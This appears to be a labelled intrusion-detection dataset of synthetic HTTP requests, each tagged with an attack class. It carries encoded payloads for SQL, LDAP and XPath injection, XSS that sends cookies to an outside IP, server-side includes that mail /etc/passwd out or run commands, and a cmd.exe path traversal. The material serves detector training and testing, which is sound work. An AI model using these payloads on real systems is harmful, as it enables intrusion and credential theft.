Via: HTTP/6.1 201.29.138.237
Transfer-Encoding: deflate
Upgrade: ewJ/9.0
Warning: 369 www.lroioecl.jpeg "ra1tNci" 
X-Forwarded-For: 101.85.128.32
X-Serial-Number: 1010994054
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42959
Start - Id: 42571
class: SqlInjection
GET /ed2bKTxBeLykK0HIt3Ub/qbica.tiff?B1Xsam84=eT&sleitE=c&oiyesetMcel7eI=o4n%400&5yicanoIthanna=%27++%29+++++UNION+ALL+SELECT++809+++++FROM++detxtsndep++++WHERE++++%28++%27%27%3D++%27&roeesaIbnmejoi=where8U&mi=o&A7Ewdc=510027296&sem6pd7bcalreo=4286514&h1hbW0uevh7ie=7466593 HTTP/1.0
Host: 10.57.147.157:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 197.109.140.61
Cookie: .UlinknXQ=032699;6NEsseyunHr=ntl;dImthd1ytdireae=aio2uz;iZquokte8owr=acecinHo&yeehe;geapn0=lGmoA
Cookie2: $Version="9"
Date: Sat, 11 Aug 07 22:36:21 UTC
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Sat, 10 Apr 04 07:19:20 CET
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: "9WySyjfEEFSA.5o"
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 77
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM YWlpU1lrMnI5cnlOa2JsdnZsYWlsUmF3c2U3Yklvb2p0bXRmNmVpcnRs
Authorization: feet elTus=lwzomle
Range: 5581-955144,-188690,326959-661
Referer: http://www.gllkq.st/dihar6js/aehacl.tiff
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 5.5; un-nd; rv:6.2.3) Gecko/02940651
UA-CPU: MIPS
UA-Disp: 4287,1140,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x8196
Via: FTP/4.3 58.67.60.106
Transfer-Encoding: Asgn
Upgrade: idlsll/7.2
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42571
Start - Id: 47096
class: XSS
GET /uo8optK/owoxir/g6etg4aejharii/liiiorY5ttCaz/nbaoo6eeeerotaxoUlan/rTbrb/dselect04Zx@nPL/reiade/tXFY5.k3xUYdt0A4t53r/exTfF2GuRt.bin?doeE=%3Clink+++rel++++%3D++%22+++stylesheet++++++%22+href++%3D++%22+++++javascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F177.114.33.91%2Fsetoto.cgi%27%2Bdocument.cookie%29%3B%5D++++++%22++%3E&KV@ZIA0xml@=3 HTTP/1.1
Host: www.isakse.cz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-2;q=0.8, x-mac-turkish;q=0.9, iso-2022-jp
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 51.141.13.228
Cookie: aS7z9=r(oeaiametaR v?ueyid 
Cookie2: $Version="713"
Date: Tue, 25 Jan 05 08:16:50 CET
ETag: "NVqARtN0JGV.Ro_eNoEv"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Mon, 30 Oct 06 24:40:05 CET
If-Unmodified-Since: Thu, 18 Sep 08 23:26:53 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0982
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: eeao odltmn=s0Nias
Range: 74-7756,9-
Referer: /ux7nti/hhnsfma/dum4gaf.png
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 1.7; hc-ag; rv:4.1.3) Gecko/46929846
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 320x898
Via: FTP/2.4 106.167.146.32:2071
Transfer-Encoding: iaoep; rsty=jmJfss
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47096
Start - Id: 39443
class: SSI
GET /oZ9WtHsBcz4pc2Fbr/pk2i8d0ddzcln/pd/efhnnMnpwjFCiBNSfK.html?rh8sN=8aetatEgip84nUi1e&nee=Ouahfei2ta&n6=h5RFZHo&Migas=503328&i6pat0hcs0tog=e%27cmdti8niheUhmn&Ov=559195452&baei4Tltl=8318629&7sndAho=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&pvvnzoaq2=8+eto%3Ai HTTP/1.1
Host: www.nadiO.uk
Connection: gzocg
Accept: audio/*;q=0.9, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 179.178.240.191
Cookie: 3vci=thdeaxtnre;yeow9ees=tesE eecnceel
Cookie2: $Version="52"
Date: Sun, 22 Jan 06 06:28:04 UTC
ETag: "iyZi5vb8q50mVrMot"
Expect: 100-continue
From: ehchxaE@uqiltieece.org
If-Modified-Since: Thu, 08 Apr 04 10:43:50 GMT
If-Unmodified-Since: Tue, 02 Oct 07 22:55:07 GMT
If-Match: *
If-None-Match: *
If-Range: "ghcvZRmM6m1@HUw4zXuo"
Max-Forwards: 151
MIME-Version: 3.9
Pragma: txbdoh='k5t'
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic dW9FcjphdnM3
Range: 336037-3,-38380
Referer: /8eiX/hopooia.php
TE: deflate;q=0.4,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/0.7 (compatible; va3n2z4eq; Linux i586; atha5gM; w0adkat)
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: 9.6 www.7tondan.htm
Transfer-Encoding: identity
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 428 www.oheYza.htm "hrtat8k" "Sat, 01 Oct 05 21:42:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39443
Start - Id: 40176
class: SSI
GET /tr8t5vdejihintvs/yta/aw/en4nnhTvs0asLcluoak/Pn/dchwrhesnt/SW/2AQQ54vnEBRtJGoWSVM.aspx?htc=%3C%21--+++%23exec+++cmd%3D%22%2Fbin%2Fmail++a2hhh.com+++%3C+%2Fetc%2Fpasswd%22--%3E&celopwb=9i&iNyr4jkUoeda=7576811&0N1Ms0geoterw=211557942&ti6naae6=tu4%40+h0%25&eYnerxee7a=boot.inid5bwShl&ft6brtXotnGJ=%2Bexecupdatei&9optj3s=nA-seft0di&5p=7383529&gpassthruKRq-8XBR=mochaiperlg+a%3E%40+ilm%2Fn HTTP/1.0
Host: 135.67.208.235
Connection: 1pcm
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: reEi0rs-i0;q=0.9, a-sepfgis, syia6XhT-r8n
Cache-Control: no-cache
Client-ip: 34.79.0.86
Cookie: hizymunegt=0ooc;nfnrfnte6in=ec o+sn;j4TreplaceZac=wcfoeanoststet;nr=9NoorLyieiede626n
Cookie2: $Version="360"
Date: Sun, 28 Jan 07 02:25:39 CET
ETag: "Wlv33KefxTo2553"
Expect: 100-continue
From: 1unwdb@arcbteiHd.biz
If-Modified-Since: Tue, 21 Apr 09 03:05:44 CET
If-Unmodified-Since: Wed, 01 Apr 09 15:43:32 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Aug 07 04:26:02 CET
Max-Forwards: 51
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: Digest username="foPr"
Range: 537037-
Referer: http://Syena.gov/DpOu.txt
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 2.0; Ao-sN; rv:5.7.3) Gecko/13354380
UA-CPU: StrongARM
UA-Disp: 6994,159,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8851x316
Via: FTP/3.4 www.tydtChOt.html
Transfer-Encoding: omdu; etnup=hqae4
Upgrade: moke/1.6, hxef/0.0, hp0ky/1.9, nstdo/7.4, smon/0.7
Warning: 617 www.aa0efg.png "i7eeeyweupihp0u" 
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 06191135820
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40176
Start - Id: 38210
class: LdapInjection
GET /o@mStL7._Ml/3ZE4dX@qJ3Bfavyab/Ex5ysiQuEt6cts/motah3e/c9OLFmdo7WgYDLWrDNe0/nm/ly_bXejbMPD.1nx/replaceJW4C/es6oaynIIiAiSxIdpHO7/t2/aeAn.css?NG8G7andY=293&hSe=12&odoAtpoAim=%3Db%3Be&emectea5U=iPAOqWcozgG&iVperlhV=eQbGEdL9Ye&nnocedaNjsdImil=r6ee&rKeA9sernaxh=eetc%7Eii&ulpirilncDtrzt=%29++++%28+%7C++%28displayName%3Dhad*%29++%28name+%3D++had*+%29%28+++mail%3Dhad*+++%29 HTTP/1.1
Host: www.fceulanUeu.de
Connection: close
Accept: audio/*, application/*;q=0.3, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, gzip, gzip;q=0.7
Accept-Language: *;q=0.5
Cache-Control: lDtiin='d'
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="98"
Date: Sat, 19 Aug 06 17:00:17 UTC
ETag: W/"aPd7NLiKRbSbcJc"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Mon, 21 Mar 05 19:24:15 UTC
If-Unmodified-Since: Mon, 31 Dec 07 24:31:08 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Jul 09 23:12:56 UTC
Max-Forwards: 3132
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: NTLM ZWVMMnJoZWVDdnZlWGhoZmxZZDJlQXBjZHdsMmNlVHNmTG5vYw==
Range: 1527-875,9678-
Referer: http://www.jiad.be/naxathav.jpeg
TE: trailers
Trailer: Warning
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 9.3; lA-pa; rv:4.3.4) Gecko/51487395
UA-CPU: 68000
UA-Disp: 6450,8964,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 321x2267
Via: 5.3 www.gnd5uo.html, FTP/8.5 162.73.182.230
Transfer-Encoding: ptrex; jsod=uDhufr62
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 770 111.10.145.180 "gcnref5ut" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38210
Start - Id: 50058
class: XPathInjection
PUT /thdSehrocd9tifTdt/s.t0UPx/y0kgAUU9H9ZXIk/ow/eklodhnrhXueayr/e1Rt.jpeg? HTTP/1.1
Content-Length: 129
Content-Language: bexda
Content-Encoding: identity
Content-Location: http://lNelN.org/c1ats1/tnei0eeR/smdtHyh/dreMee62.jpeg
Content-MD5: YW5ydHQzYWxlbThrZTlicw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 22:33:53 UTC
Last-Modified: Sun, 22 Jul 07 01:28:11 GMT
Host: 68.129.63.171
Connection: keep-alive
Accept: audio/x-wav;q=0.8, image/jpeg;q=0.9
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, identity;q=0.0, identity, compress;q=0.0
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 66.103.242.187
Cookie: fsvohe=ilieexec;ena=detn/oen5I/nEsue/child::node()[position()=590]    or    'nt'   =    '
Cookie2: $Version="188"
Date: Wed, 30 May 07 04:01:38 UTC
ETag: W/"1@69SC6OhsctPUz"
Expect: r24i8zs=isToioa;Csx2r
From: tndo@hOino.uk
If-Modified-Since: Mon, 09 Mar 09 17:43:26 UTC
If-Unmodified-Since: Sat, 10 Jan 04 14:04:08 CET
If-Match: "-rxAj39XiudT0-pXIO_"
If-None-Match: *
If-Range: Sat, 16 Jul 05 04:14:15 CET
Max-Forwards: 53
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVpZmluYTpybnJydDJlbw==
Authorization: nlihH auttehGj=itFhkT4
Range: 9-
Referer: http://cketaere.it/lelguh.jsp
TE: chunked;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.7 (Windows; U; Win98 7.8; He-ph; rv:7.6.6) Gecko/71098928
UA-CPU: MIPS
UA-Disp: 086,0919,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3705x532
Via: FTP/2.6 www.bOiod.jpeg, 6.9 18.84.11.137
Transfer-Encoding: compress
Upgrade: seeim/7.5, eeEad/9.1, noaakN/7.4, uat/4.4, Shme/3.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 78.250.5.71
X-Serial-Number: 34243313236496
----: ---------------------------
~~~~~: ~~~~~~~~~~~

A3s7tseot=A6pe&amjif5dtentnP=tyOjBjWrqjw&ouenr=hTatrnasftEtotj&92saY1ZJALSd=waGl&ihU1noFsieenoe=ha=p%update%onullemail8ncet

End - Id: 50058
Start - Id: 38344
class: LdapInjection
GET /hv1pTV_M0TNr0mxO/xdem/shKV4cM.jpg?tnJnjstfpTasv=41&lnrno4sunE=coU&ndivhSH7rhttpsinputaT=enr&o3wnceneazeTs2s=%29+++%28++%7C++++%28displayName%3Dhad*%29+%28name++%3D++++had*++%29%28+++mail%3Dhad*%29&adw=drzstimgIpEdih+ HTTP/1.0
Host: www.aaeee8k.fr:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic, euc-kr, euc-tw;q=0.7, euc-cn;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: axIee-Ehy;q=0.5, vN5ydsn3-lmai;q=0.2
Cache-Control: min-fresh=9
Client-ip: 103.183.132.251
Cookie: ixcshutdown5ilogmj9=1748073057;qIOueandhpKf=oehttpinsdT+Teh
Cookie2: $Version="10"
Date: Sun, 10 May 09 01:46:53 CET
ETag: W/"jY2.4@.9Gn685Hve_bc"
Expect: ieh7h=nriwecet;a0nluni=hep6t
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 18 Dec 04 15:06:25 CET
If-Unmodified-Since: Fri, 06 May 05 17:40:11 GMT
If-Match: *
If-None-Match: "PMHHu.9VKtT0TGC"
If-Range: *
Max-Forwards: 43
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM bXB0aXhhMGFvZWM3YWhzZXNnb3RzdGVzeGFsb1RjSGxDMGNhOG5lcmloaHM=
Range: -0,575785-
Referer: /sa8wool/Wneotdzu/niteo/etsw.nsf
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/9.6 (X11; U; Linux i386 3.3; Cv-ii; rv:4.7.6) Gecko/13196306
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 896x746
Via: uiwtsY/9.5 www.hnetr.jpeg, itow/7.8 www.iaxw.js
Transfer-Encoding: gzip
Upgrade: eaPnRh/6.3, s8Res/6.6, cet/9.4
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38344
Start - Id: 44987
class: PathTransversal
GET /83WEY@IATeD0EkVkMT/h6hCuM/otal8RN/x7we5Cm3UYpjfvWSa4./yFgf8273tYbLF_/WatnUk6.css?vose9t=25952679&tt4d5Oizt=2&e7az=302&a9yee=doc%28+file%3A%2F%2F%2Fc%3A%2Feiv%2FIatAu.xml%29 HTTP/1.0
Host: www.ttoot.st
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: gdcwA6-hhreEtee, iintEtq-frt;q=0.1, gLoipeuf-zEe, enirr-reetn
Cache-Control: no-transform
Client-ip: 223.133.197.156
Cookie: diah=o+N9e9+Es ;qqs
Cookie2: $Version="6"
Date: Mon, 25 Feb 08 07:29:31 GMT
ETag: W/"kfg0XtToc0DOOERgOPz"
Expect: potvSX=cregh;Dgtzo=behsO1a
From: esra@5dfeusd9Lo.de
If-Modified-Since: Mon, 29 May 06 23:29:52 CET
If-Unmodified-Since: Tue, 22 Mar 05 16:23:36 CET
If-Match: "Q1dg_CJzfeXLivc"
If-None-Match: "3MM8ouQr5OiK1-pX"
If-Range: *
Max-Forwards: 7549
MIME-Version: 0.8
Pragma: omtlhk=sIcq
Proxy-Authorization: Basic ZW5sdGlvTnU6aDV0cG5l
Authorization: NTLM dWZlbHVobjJ0YW5vb3hzdXp0ZXRobk13dVZsZ0RjcmhvZWhtaHQ=
Range: 73-,999598-14093
Referer: http://www.tubzeywm.gov/3lEawi.bin
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: oaE4ia/1.4.1
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 0.0 157.187.125.92, 4.8 www.rrtdsmo.js:084, gvou/6.7 64.107.225.99
Transfer-Encoding: deflate
Upgrade: d7xp/5.9, eqo/0.5, QOiaE/6.5, etnjl/1.3, wyhl/7.7
Warning: 947 104.115.69.47 "thhtcs4" "Tue, 22 Jul 08 21:19:00 GMT"
X-Forwarded-For: 235.153.99.79
X-Serial-Number: 8606404239
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44987
Start - Id: 49447
class: XPathInjection
GET /2l@UnrZZk4YA/cidf/ePwcdT2bmef/mservicesAdeleteWdEWsam/ipeIEtm-Hoc2hz/seuYiohSeeD0bs.asp?eSqcgsjieei=h+2yusr%3BiPaoe&eyijendA98ekeI=572418&mekG=sa%40L3E_yF&MebWzwktmp2J5.=i%2Fke%2Fesr%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D76%5D+++or+++++%27nd%27++%3D++++%27&echocB0I=hsg1C&ips5chiatnshs=39039435&omelhhetb=Ht9ginrjhse%2FcSeh9all9body&dyst8t6aDrh=eH0RYpPML6 HTTP/1.0
Host: 49.83.212.115:1
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 111.175.169.32
Cookie: d4e6r1bsEtsletn=~2|fbetweeneneenatmm%u;dnfddg=31;UcstcRiis8= ssMsWxdboa8ptS;O32afoNp=20914
Cookie2: $Version="260"
Date: Thu, 28 May 09 18:31:06 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: skayetla
From: n5thibdN@srSdAet.st
If-Modified-Since: Sun, 30 Apr 06 15:09:30 CET
If-Unmodified-Since: Mon, 23 Jan 06 16:47:43 GMT
If-Match: "GcEp3ypmu@-2ZUfMk"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.6
Pragma: m=gelnEeb
Proxy-Authorization: Digest nc=3d94f4fE
Authorization: Basic ZWRsY3JsOm5ub2I=
Range: 894764-6
Referer: http://Noudcro.org/ebaaa/nrurO2rn/xDathCa7.swf
TE: gzip;q=0.0,deflate;q=0.7
Trailer: If-Match
User-Agent: Mozilla/6.6 (compatible; Konqueror/2.7; Unix; Odntngh7bh)
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 950x8575
Via: FTP/3.2 www.2Opg.html:05816, cnt/4.7 123.191.221.150, FTP/8.1 www.lnwmusA.jpeg:38219
Transfer-Encoding: identity
Upgrade: 4wre/8.6, sckoiq/7.6
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 210.37.128.90
X-Serial-Number: 812184590933752195
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49447
Start - Id: 41978
class: SqlInjection
GET /pTbKndTraUtMPKrgyW/sMdU@te9rdCzAaZPuES/18.bF/5vSSh7USOdVdO5KtN/eIxoeain4tobdoEs5sra.jpg?bodyzyrKaRoreKYB=vad+pvbscriptldts&tIlbmto3l8ks=116&rkfnh3seeh=glepasswd&mdfoj=%3B++++insert+++++into+OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3Desazuo3bsn%3Bpwd%3Doiue6l%3BNetwork%3DDBMSSOCN%3BAddress%3D31.39.244.184%2C1433%3B%27%2C%27select+++++*+++++from++++_sysdatabases%27+%29%3B+++select++++*+++from++++LinkedOrRemoteSrv1.master.dbo.sysdatabases&edwoz=7061&H1=n+oetna HTTP/1.1
Host: 110.227.67.169:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.6, compress, identity;q=0.4, deflate, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 138.9.3.13
Cookie: nisd8enca=pcrl;yth3hn1maee=vre
Cookie2: $Version="6"
Date: Tue, 04 May 04 24:22:23 UTC
ETag: W/"Og0DfX_az@vGIC@GluS"
Expect: 100-continue
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Mon, 28 Feb 05 18:38:12 GMT
If-Unmodified-Since: Wed, 10 May 06 16:20:19 UTC
If-Match: *
If-None-Match: "vwge@FysRj3zYHz"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 8351
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Digest opaque="4rmo"
Range: -221064
Referer: http://blqi.gov/ihsa2n/intTda/syrr3/Dsnet.ace
TE: trailers,deflate;q=0.1
Trailer: If-Range
User-Agent: Mozilla/3.5 (compatible; Konqueror/7.3; Linux i586; reyp)
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 329x4778
Via: drtyN/9.2 www.uvoo.tiff, 5.1 169.244.158.211
Transfer-Encoding: compress
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 237 www.niiai.tiff "6aniv2xeemiUvSmef1" "Fri, 09 Apr 04 14:40:51 GMT"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 382676240
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41978
Start - Id: 43961
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.nAnpdrlg.uk
Connection: eeravro
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 212.166.230.53
Cookie: e5Tan3dt4tAh=88228;sE28uUMH=2858544684
Cookie2: $Version="588"
Date: Thu, 06 May 04 17:50:06 GMT
ETag: "KgvdimAZzmUx0@VVDP"
Expect: naaaaho=iektd;i12sv
From: axenii@lMdner.de
If-Modified-Since: Wed, 06 Jun 07 12:18:26 UTC
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: *
If-None-Match: "TnLZIU2f0.99vFlosoA"
If-Range: "3APDI6BU.OEnPQA"
Max-Forwards: 7324
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: Digest opaque="ntlogo"
Range: 97793-3,500796-0
Referer: http://zihbdtor.biz/d4o7/traeiiek.swf
TE: trailers,deflate,trailers
Trailer: Referer
User-Agent: mOZuZP http://www.sAmp.uk
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4200x926
Via: 3.0 39.235.101.204, 8.9 68.204.108.232, HTTP/6.2 145.167.90.217
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43961
Start - Id: 40115
class: SSI
GET /mrsi2/rDcAjxFbqyu._/nr/oMLbtJf0x/hgbbLT9447reJbB-/an/jSaPrvr0w/naece9aeeaEerhrkea/eHbUWkCT_8Jwt0MEgC.I.htm?TnDs6Ngn6mtrt=eMt1J_A-YWcE&gbdyla3c2ag=%3C%21++%23%3C%21--++++%23exec+++cmd%3D%22id%22--%3E&JDJu3XMD030d.=14945378&Noror5heoeh=wtncPdNems9&rzft=11470 HTTP/1.1
Host: www.eepOseo.gov
Connection: y2piile
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.4, gzip;q=0.0, deflate, compress;q=0.1, compress
Accept-Language: *;q=0.8
Cache-Control: lssj5ds=o
Client-ip: 149.0.44.161
Cookie: neuMdlyvlwnI=1stasH8seg/3setsdo;e3iup=lW.P;reuo5littjr0=fnlhewmh
Cookie2: $Version="5"
Date: Sat, 09 Jul 05 10:22:06 CET
ETag: W/"79F5Ef8wKTb4zqQ"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Sun, 04 Feb 07 08:02:34 CET
If-Unmodified-Since: Wed, 10 Oct 07 23:00:49 CET
If-Match: *
If-None-Match: "QBL6hjAmg7Mh1Slj"
If-Range: ".psjwGA0JiTgvL77NC"
Max-Forwards: 1014
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic cGlwZWk6YWF3Yg==
Authorization: lcb2Rh 8feofloz=9eso
Range: 01784-577,9-7,8678-
Referer: /AdEloj/ivsn.cfm
TE: deflate
Trailer: Proxy-Authorization
User-Agent: eoeotoUsob/2.2.7
UA-CPU: 68000
UA-Disp: 3405,153,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7286x8366
Via: 3.9 238.176.162.116, FTP/7.3 www.eegmcn.htm
Transfer-Encoding: identity
Upgrade: uwekht/7.8, pbs/0.4, Iln/7.7, tec/5.7
Warning: 530 www.keiqse.jpeg "tjsEot3eeoicdet6rlc" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 3431591
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40115
Start - Id: 38604
class: LdapInjection
GET /nJiKDyfpD_9Tukb7wHgq/npp/gfvhmmM4jI/gOHt6.ESUCQWa6D2iiW./Yetc./o-kc3stTDDFpbuc/7nEr/ttlNAes/edrynaafshreqieco.htm?ntonamen7t4heT=%3C5%3Ee&Mbgsound2S=p&stdinfWA9scriptT=1129924&narmn9ti=6&a1beeinooAea4jr=994%29%28%26%28objectClass%3DFju%29%28%7C%28sn++++%3D++gdnE%29%28cn%3Dlb+++++J*%29%29&.zA24exec-Q=processing-instructionu&oesiear=rxYF30Ru_j HTTP/1.0
Host: www.lsc5r.ch
Connection: close
Accept: image/png, audio/*;q=0.8, video/quicktime
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 224.106.158.13
Cookie: 9ubmohnc7iA7j=teTsri5U;bqxqaeeer7=3091862;od2seoiun=Q 2sSxp eR
Cookie2: $Version="7"
Date: Tue, 13 May 08 10:13:53 CET
ETag: "iQ3hMG_PxxxiTSYTYE"
Expect: trilhrm
From: RwOaaelp@gdhst.com
If-Modified-Since: Sat, 17 Mar 07 19:18:02 GMT
If-Unmodified-Since: Sat, 21 Jun 08 05:38:38 GMT
If-Match: "wQShND06l7JPZa6y@"
If-None-Match: "CC0NWthY0Da5Qa46LH"
If-Range: Sat, 25 Jun 05 18:21:41 CET
Max-Forwards: 2379
MIME-Version: 8.6
Pragma: wHdis='i'
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM YWRiZW9EaHB1cUN6cmdkbDdpdHJuY250NG9haGVkOXFkSWV3bmNlTnU1ZQ==
Range: -348176
Referer: http://www.jreyutr.de/tidih/gINnswn.asmx
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/4.9 (Windows; U; Win98 1.2; fn-2e; rv:5.2.9) Gecko/90956860
UA-CPU: Sparc
UA-Disp: 7529,000,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5664x146
Via: HTTP/3.3 www.ce5Ee.jpg, FTP/5.5 105.60.88.188
Transfer-Encoding: compress
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 156 www.amoaxg.gif "c0dtoegins4aneef" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: --------------------------------------------
